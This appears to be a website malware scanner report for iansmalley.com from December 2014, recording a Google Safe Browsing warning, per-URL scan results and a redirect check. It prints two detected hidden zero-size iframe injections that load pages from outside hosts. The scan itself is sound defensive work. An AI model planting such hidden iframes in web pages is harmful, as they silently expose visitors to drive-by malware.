Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=iansmalley.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://iansmalley.com/ | 200 OK Content-Length: 10272 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://thetrainingbrokerage.co.uk/r.php
<iframe src="http://thetrainingbrokerage.co.uk/r.php" width=0 height=0 frameborder=0>
Hidden iFrame found. size: 0x0 src: http://lotsofmots.gv.vg/showthread.php?t=82151300
<iframe src="http://lotsofmots.gv.vg/showthread.php?t=82151300" width=0 height=0 frameborder=0>
http://merchant.aegispayments.com/in.cgi?default | 500 Can't connect to merchant.aegispayments.com:80 Content-Length: 201 Content-Type: text/plain | clean |
http://merchant.aegispayments.com/test404page.js | 500 Can't connect to merchant.aegispayments.com:80 Content-Length: 201 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: iansmalley.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Dec 2014 21:27:12 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 10272
Content-Type: text/html
...10272 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: iansmalley.com
Referer: http://www.google.com/search?q=iansmalley.com
Result:
The result is similar to the first query. There are no suspicious redirects found.